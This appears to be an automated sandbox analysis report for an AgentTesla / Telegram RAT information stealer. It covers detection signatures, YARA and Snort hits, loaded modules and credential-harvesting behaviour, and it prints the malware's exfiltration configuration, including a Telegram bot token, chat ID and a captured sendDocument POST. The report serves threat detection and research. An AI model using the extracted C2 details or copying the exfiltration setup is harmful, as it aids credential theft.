Edit tour

Windows Analysis Report
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Overview

General Information

Sample name:	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
Analysis ID:	1430866
MD5:	ab696103426e266ed3729c899e11e778
SHA1:	12aa01403e8f348853598d6da5b304da02cc3d57
SHA256:	7151fdf1eb6797e332cdd21c6084e1b338f84fb6652284599370cf609776a676
Tags:	base64-decodedexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected Telegram RAT

Contains functionality to log keystrokes (.Net Source)

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe (PID: 3872 cmdline: "C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe" MD5: AB696103426E266ED3729C899E11E778)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage?chat_id=595808702"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33cfe:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33d70:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33dfa:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33e8c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33ef6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33f68:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33ffe:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3408e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2889163730.00000000026BE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33cfe:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33d70:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33dfa:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33e8c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33ef6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33f68:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33ffe:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3408e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 149.154.167.220

Timestamp:	04/24/24-10:16:17.850504
SID:	2851779
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Avira: detected

Found malware configuration

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage?chat_id=595808702"}
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.3872.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendMessage"}

Multi AV Scanner detection for submitted file

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Virustotal: Detection: 63%			Perma Link
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	ReversingLabs: Detection: 71%

Machine Learning detection for sample

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Joe Sandbox ML: detected

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49730 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: POST /bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc64479371e3d5Host: api.telegram.orgContent-Length: 914Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: unknown

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	String found in binary or memory: https://account.dyn.com/
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	String found in binary or memory: https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 7KG.cs

.Net Code: vGrp

System Summary

Malicious sample detected (through community Yara rule)

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Code function: 0_2_025B4A48	0_2_025B4A48
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Code function: 0_2_025B9B20	0_2_025B9B20
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Code function: 0_2_025B3E30	0_2_025B3E30
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Code function: 0_2_025BCD98	0_2_025BCD98
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Code function: 0_2_025B4178	0_2_025B4178

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2888404652.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2888092291.00000000006F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000000.1640893595.000000000027E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename397ccd64-9aef-40f4-b35a-72c6ae1991b9.exe4 vs 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Binary or memory string: OriginalFilename397ccd64-9aef-40f4-b35a-72c6ae1991b9.exe4 vs 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 1UT6pzc0M.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, DnQOD3M.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 01seU.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, iUDwvr7Gz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, XUu2qKyuF6.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, aZathEIgR.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, l50VLEll22.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, l50VLEll22.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Binary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Mutant created: NULL

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Virustotal: Detection: 63%
Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

